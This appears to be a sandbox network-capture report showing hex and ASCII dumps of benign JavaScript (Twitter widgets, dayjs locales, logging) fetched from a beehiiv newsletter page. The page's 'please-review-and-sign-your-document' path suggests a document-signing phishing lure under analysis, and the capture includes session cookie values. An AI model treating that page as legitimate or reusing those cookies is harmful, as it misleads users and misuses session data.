                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 65 6e 74 73 2c 32 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 72 2e 74 6f 52 65 61 6c 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79 28 65 2c 6e 2e 63 6f 6e 63 61 74 28 69 29 29 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 2e 65 78 70 6f 72 74 73 3d 6c 6f 63 61 74 69 6f 6e 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 34 37 29 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 65 77 20 72 28 22 5f 5f 74 77 74 74 72 22 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 30 29 2c 69 3d 2f 5c 62 28 5b 5c 77 2d 5f 5d 2b 29 5c 62 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 67 45
                                                                                                                                            Data Ascii: ents,2);return function(){var i=r.toRealArray(arguments);return t.apply(e,n.concat(i))}}},function(t,e){t.exports=location},function(t,e,n){var r=n(47);t.exports=new r("__twttr")},function(t,e,n){var r=n(0),i=/\b([\w-_]+)\b/g;function o(t){return new RegE
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 31 30 39 29 2c 69 3d 6e 28 32 31 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 22 64 61 74 61 2d 74 77 69 74 74 65 72 2d 65 78 74 72 61 63 74 65 64 2d 22 2b 69 2e 67 65 6e 65 72 61 74 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 72 28 65 2c 6e 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 74 29 7d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 74 2c 22 74 72 75 65 22 29 2c 65 7d 29 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29
                                                                                                                                            Data Ascii: }},function(t,e,n){var r=n(109),i=n(21);t.exports=function(){var t="data-twitter-extracted-"+i.generate();return function(e,n){return r(e,n).filter(function(e){return!e.hasAttribute(t)}).map(function(e){return e.setAttribute(t,"true"),e})}}},function(t,e)
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 68 69 66 74 28 29 7d 29 2c 61 2e 61 73 42 6f 6f 6c 65 61 6e 28 66 2e 64 6e 74 29 26 26 69 2e 73 65 74 4f 6e 28 29 2c 68 3d 73 2e 67 65 74 45 78 70 65 72 69 6d 65 6e 74 73 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6f 2e 61 64 64 57 69 64 67 65 74 28 6e 28 66 2c 6c 2c 76 6f 69 64 20 30 2c 74 29 29 7d 29 2c 64 26 26 68 2e 74 68 65 6e 28 64 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 21 31 29 7d 29 2c 68 29 3a 28 64 26 26 75 2e 61 73 79 6e 63 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 21 31 29 7d 29 2c 72 2e 72 65 6a 65 63 74 28 6e 65 77 20 45 72 72 6f 72 28 22 4e 6f 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 73 70 65 63 69 66 69 65 64 2e 20 45 78 70 65 63 74 65 64 3a 20 22 2b 63 29 29 29 7d 7d 7d 2c 66 75 6e 63 74 69
                                                                                                                                            Data Ascii: hift()}),a.asBoolean(f.dnt)&&i.setOn(),h=s.getExperiments().then(function(t){return o.addWidget(n(f,l,void 0,t))}),d&&h.then(d,function(){d(!1)}),h):(d&&u.async(function(){d(!1)}),r.reject(new Error("No target element specified. Expected: "+c)))}}},functi
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 22 66 75 6e 63 74 69 6f 6e 22 2c 74 29 26 26 28 6e 3d 65 2c 65 3d 74 2c 74 3d 31 29 2c 72 2e 64 65 66 65 72 28 74 2c 73 28 65 2c 61 29 2c 6e 29 2c 61 2e 70 72 6f 6d 69 73 65 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 38 29 2c 69 3d 6e 28 31 29 2c 6f 3d 6e 28 30 29 2c 73 3d 7b 7d 2c 61 3d 6f 2e 63 6f 6e 74 61 69 6e 73 28 72 2e 68 72 65 66 2c 22 74 77 5f 64 65 62 75 67 3d 74 72 75 65 22 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 72 65 74 75 72 6e 20 69 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 2b 69 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 7c 7c 2b 6e 65 77 20 44 61 74 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29
                                                                                                                                            Data Ascii: "function",t)&&(n=e,e=t,t=1),r.defer(t,s(e,a),n),a.promise}}},function(t,e,n){var r=n(8),i=n(1),o=n(0),s={},a=o.contains(r.href,"tw_debug=true");function u(){}function c(){}function d(){return i.performance&&+i.performance.now()||+new Date}function f(t,e)
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 65 78 70 6f 72 74 73 3d 7b 72 65 74 69 6e 61 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 3d 74 7c 7c 6f 29 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 3f 74 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 3e 3d 31 2e 35 3a 21 21 74 2e 6d 61 74 63 68 4d 65 64 69 61 26 26 74 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 34 34 64 70 69 29 22 29 2e 6d 61 74 63 68 65 73 7d 2c 61 6e 79 49 45 3a 75 2c 69 65 39 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 2f 4d 53 49 45 20 39 2f 2e 74 65 73 74 28 74 3d 74 7c 7c 61 29 7d 2c 69 65 31 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 2f 4d 53 49 45 20 31 30 2f 2e 74 65 73
                                                                                                                                            Data Ascii: exports={retina:function(t){return(t=t||o).devicePixelRatio?t.devicePixelRatio>=1.5:!!t.matchMedia&&t.matchMedia("only screen and (min-resolution: 144dpi)").matches},anyIE:u,ie9:function(t){return/MSIE 9/.test(t=t||a)},ie10:function(t){return/MSIE 10/.tes


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            23192.168.2.1649736104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC840OUTGET /assets/index-BdpAPpdN.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1959
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"7a7-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89b8c294315-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 35 33 35 62 32 38 30 2d 33 36 62 64 2d 35 64 61 35 2d 39 33 64 33 2d 34 35 66 61 38 32 30 34 32 32 34 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0535b280-36bd-5da5-93d3-45fa82042241")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 20 78 3d 63 28 6d 2c 6c 3d 3d 3d 22 74 69 74 6c 65 22 26 26 22 77 74 2d 68 65 61 64 65 72 2d 66 6f 6e 74 22 2c 6c 3d 3d 3d 22 62 6f 64 79 22 26 26 22 77 74 2d 62 6f 64 79 2d 66 6f 6e 74 22 2c 65 3d 3d 3d 22 63 6f 6e 74 65 6e 74 22 26 26 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 22 2c 65 3d 3d 3d 22 73 75 62 73 63 72 69 62 65 2d 67 61 74 65 22 26 26 22 74 65 78 74 2d 77 74 2d 62 61 63 6b 67 72 6f 75 6e 64 22 2c 65 3d 3d 3d 22 73 75 62 73 63 72 69 62 65 2d 67 61 74 65 2d 62 6f 74 74 6f 6d 22 26 26 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 22 2c 65 3d 3d 3d 22 73 75 62 73 63 72 69 62 65 22 26 26 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 73 75 62 73 63 72 69 62 65 2d 62 61
                                                                                                                                            Data Ascii: x=c(m,l==="title"&&"wt-header-font",l==="body"&&"wt-body-font",e==="content"&&"text-wt-text-on-background",e==="subscribe-gate"&&"text-wt-background",e==="subscribe-gate-bottom"&&"text-wt-text-on-background",e==="subscribe"&&"text-wt-text-on-subscribe-ba
                                                                                                                                            2025-01-15 18:14:33 UTC133INData Raw: 73 73 4e 61 6d 65 3a 78 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 7d 7d 3b 65 78 70 6f 72 74 7b 62 20 61 73 20 54 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 6e 64 65 78 2d 42 64 70 41 50 70 64 4e 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 30 35 33 35 62 32 38 30 2d 33 36 62 64 2d 35 64 61 35 2d 39 33 64 33 2d 34 35 66 61 38 32 30 34 32 32 34 31 0a
                                                                                                                                            Data Ascii: ssName:x,children:t})}};export{b as T};//# sourceMappingURL=index-BdpAPpdN.js.map//# debugId=0535b280-36bd-5da5-93d3-45fa82042241


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            24192.168.2.1649737104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC557OUTGET /assets/entry.client-CuBsnk-1.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 341783
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"53717-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89bae72334e-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 38 38 64 30 33 32 61 2d 65 30 33 31 2d 35 30 34 32 2d 62 37 64 34 2d 36 62 31 33 62 34 65 64 35 35 38 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="988d032a-e031-5042-b7d4-6b13b4ed5582")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 2f 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 69 20 61 73 20 76 79 2c 70 20 61 73 20 64 63 2c 5f 20 61 73 20 61 73 2c 73 20 61 73 20 42 6e 2c 61 20 61 73 20 53 79 2c 62 20 61 73 20 5f 79 2c 63 20 61 73 20 62 79 2c 64 20 61 73 20 45 79 2c 65 20 61 73 20 4d 79 2c 66 20 61 73 20 77 79 2c 67 20 61 73 20 52 79 2c 68 20 61 73 20 54 79 2c 75 20 61 73 20 41 79 2c 6a 20 61 73 20 4f 79 2c 53 20 61 73 20 44 79 2c 6b 20 61 73 20 78 79 2c 6c 20 61 73 20 43 79 2c 6d 20 61 73 20 7a 79 2c 6e 20 61 73 20 67 64 2c 6f 20 61 73 20 6b 79 2c 71 20 61 73 20 4e 79 2c 72 20 61 73 20 55 79 2c 74 20 61 73 20 4c 79 7d 66 72 6f 6d 22 2e 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 64 66 55 5f 5a 4b 61 57 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 47
                                                                                                                                            Data Ascii: /dayjs.min-B8CfgAhU.js";import{i as vy,p as dc,_ as as,s as Bn,a as Sy,b as _y,c as by,d as Ey,e as My,f as wy,g as Ry,h as Ty,u as Ay,j as Oy,S as Dy,k as xy,l as Cy,m as zy,n as gd,o as ky,q as Ny,r as Uy,t as Ly}from"./performance-dfU_ZKaW.js";import{G
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6d 62 65 72 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 6f 72 64 69 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 61 3d 5b 22 74 68 22 2c 22 73 74 22 2c 22 6e 64 22 2c 22 72 64 22 5d 2c 69 3d 6e 25 31 30 30 3b 72 65 74 75 72 6e 22 5b 22 2b 6e 2b 28 61 5b 28 69 2d 32 30 29 25 31 30 5d 7c 7c 61 5b 69 5d 7c 7c 61 5b 30 5d 29 2b 22 5d 22 7d 7d 7d 29 7d 29 28 67 67 29 3b 76 61 72 20 76 67 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 61 29 7b 74 2e 65 78 70 6f 72 74 73 3d 61 28 4a 69 28 29 29 7d 29 28 6d 65 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 72 29 7b 72 65 74 75 72 6e 20 72 26 26 74 79 70 65 6f 66 20 72 3d 3d 22 6f 62 6a 65 63 74 22 26 26
                                                                                                                                            Data Ascii: mber".split("_"),ordinal:function(n){var a=["th","st","nd","rd"],i=n%100;return"["+n+(a[(i-20)%10]||a[i]||a[0])+"]"}}})})(gg);var vg={exports:{}};(function(t,e){(function(n,a){t.exports=a(Ji())})(me,function(n){function a(r){return r&&typeof r=="object"&&
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 75 6e 64 65 22 2c 22 65 69 6e 65 72 20 53 74 75 6e 64 65 22 5d 2c 68 68 3a 22 25 64 20 53 74 75 6e 64 65 6e 22 2c 64 3a 5b 22 65 69 6e 20 54 61 67 22 2c 22 65 69 6e 65 6d 20 54 61 67 22 5d 2c 64 64 3a 5b 22 25 64 20 54 61 67 65 22 2c 22 25 64 20 54 61 67 65 6e 22 5d 2c 4d 3a 5b 22 65 69 6e 20 4d 6f 6e 61 74 22 2c 22 65 69 6e 65 6d 20 4d 6f 6e 61 74 22 5d 2c 4d 4d 3a 5b 22 25 64 20 4d 6f 6e 61 74 65 22 2c 22 25 64 20 4d 6f 6e 61 74 65 6e 22 5d 2c 79 3a 5b 22 65 69 6e 20 4a 61 68 72 22 2c 22 65 69 6e 65 6d 20 4a 61 68 72 22 5d 2c 79 79 3a 5b 22 25 64 20 4a 61 68 72 65 22 2c 22 25 64 20 4a 61 68 72 65 6e 22 5d 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 75 2c 6f 2c 66 29 7b 76 61 72 20 64 3d 6c 5b 66 5d 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61
                                                                                                                                            Data Ascii: unde","einer Stunde"],hh:"%d Stunden",d:["ein Tag","einem Tag"],dd:["%d Tage","%d Tagen"],M:["ein Monat","einem Monat"],MM:["%d Monate","%d Monaten"],y:["ein Jahr","einem Jahr"],yy:["%d Jahre","%d Jahren"]};function r(u,o,f){var d=l[f];return Array.isArra
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6f 6e 74 68 73 3a 22 6a 61 6e 76 69 65 72 5f 66 c3 a9 76 72 69 65 72 5f 6d 61 72 73 5f 61 76 72 69 6c 5f 6d 61 69 5f 6a 75 69 6e 5f 6a 75 69 6c 6c 65 74 5f 61 6f c3 bb 74 5f 73 65 70 74 65 6d 62 72 65 5f 6f 63 74 6f 62 72 65 5f 6e 6f 76 65 6d 62 72 65 5f 64 c3 a9 63 65 6d 62 72 65 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 6d 6f 6e 74 68 73 53 68 6f 72 74 3a 22 6a 61 6e 76 2e 5f 66 c3 a9 76 72 2e 5f 6d 61 72 73 5f 61 76 72 2e 5f 6d 61 69 5f 6a 75 69 6e 5f 6a 75 69 6c 2e 5f 61 6f c3 bb 74 5f 73 65 70 74 2e 5f 6f 63 74 2e 5f 6e 6f 76 2e 5f 64 c3 a9 63 2e 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 77 65 65 6b 53 74 61 72 74 3a 31 2c 79 65 61 72 53 74 61 72 74 3a 34 2c 66 6f 72 6d 61 74 73 3a 7b 4c 54 3a 22 48 48 3a 6d 6d 22 2c 4c 54 53 3a 22 48 48 3a 6d 6d 3a 73 73
                                                                                                                                            Data Ascii: onths:"janvier_fvrier_mars_avril_mai_juin_juillet_aot_septembre_octobre_novembre_dcembre".split("_"),monthsShort:"janv._fvr._mars_avr._mai_juin_juil._aot_sept._oct._nov._dc.".split("_"),weekStart:1,yearStart:4,formats:{LT:"HH:mm",LTS:"HH:mm:ss
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 61 22 2c 73 3a 22 71 75 61 6c 63 68 65 20 73 65 63 6f 6e 64 6f 22 2c 6d 3a 22 75 6e 20 6d 69 6e 75 74 6f 22 2c 6d 6d 3a 22 25 64 20 6d 69 6e 75 74 69 22 2c 68 3a 22 75 6e 27 20 6f 72 61 22 2c 68 68 3a 22 25 64 20 6f 72 65 22 2c 64 3a 22 75 6e 20 67 69 6f 72 6e 6f 22 2c 64 64 3a 22 25 64 20 67 69 6f 72 6e 69 22 2c 4d 3a 22 75 6e 20 6d 65 73 65 22 2c 4d 4d 3a 22 25 64 20 6d 65 73 69 22 2c 79 3a 22 75 6e 20 61 6e 6e 6f 22 2c 79 79 3a 22 25 64 20 61 6e 6e 69 22 7d 2c 6f 72 64 69 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 72 2b 22 c2 ba 22 7d 7d 3b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 2e 6c 6f 63 61 6c 65 28 6c 2c 6e 75 6c 6c 2c 21 30 29 2c 6c 7d 29 7d 29 28 62 67 29 3b 76 61 72 20 45 67 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d
                                                                                                                                            Data Ascii: a",s:"qualche secondo",m:"un minuto",mm:"%d minuti",h:"un' ora",hh:"%d ore",d:"un giorno",dd:"%d giorni",M:"un mese",MM:"%d mesi",y:"un anno",yy:"%d anni"},ordinal:function(r){return r+""}};return i.default.locale(l,null,!0),l})})(bg);var Eg={exports:{}
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 77 68 69 74 65 22 2c 22 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 30 2e 35 65 6d 22 2c 22 66 6f 6e 74 2d 77 65 69 67 68 74 22 3a 22 62 6f 6c 64 22 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 20 30 2e 35 65 6d 22 7d 2c 69 6e 66 6f 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 22 23 33 34 39 38 64 62 22 2c 63 6f 6c 6f 72 3a 22 77 68 69 74 65 22 2c 22 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 30 2e 35 65 6d 22 2c 22 66 6f 6e 74 2d 77 65 69 67 68 74 22 3a 22 62 6f 6c 64 22 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 20 30 2e 35 65 6d 22 7d 2c 6c 6f 67 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 22 23 32 65 63 63 37 31 22 2c 63 6f 6c 6f 72 3a 22 77 68 69 74 65 22 2c 22 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 30 2e 35 65 6d 22 2c 22 66 6f 6e 74 2d 77 65 69 67 68
                                                                                                                                            Data Ascii: white","border-radius":"0.5em","font-weight":"bold",padding:"2px 0.5em"},info:{background:"#3498db",color:"white","border-radius":"0.5em","font-weight":"bold",padding:"2px 0.5em"},log:{background:"#2ecc71",color:"white","border-radius":"0.5em","font-weigh
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 67 28 22 64 65 62 75 67 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 64 65 62 75 67 22 2c 65 29 7d 69 6e 66 6f 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 69 6e 66 6f 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 69 6e 66 6f 22 2c 65 29 7d 6c 6f 67 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 6c 6f 67 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 6c 6f 67 22 2c 65 29 7d 77 61 72 6e 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 77 61 72 6e 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 77 61 72 6e 22 2c 65 29 7d 65 72 72 6f 72 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 65 72 72 6f 72 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 65 72 72 6f 72 22 2c
                                                                                                                                            Data Ascii: g("debug")&&this.print("debug",e)}info(...e){this.shouldLog("info")&&this.print("info",e)}log(...e){this.shouldLog("log")&&this.print("log",e)}warn(...e){this.shouldLog("warn")&&this.print("warn",e)}error(...e){this.shouldLog("error")&&this.print("error",
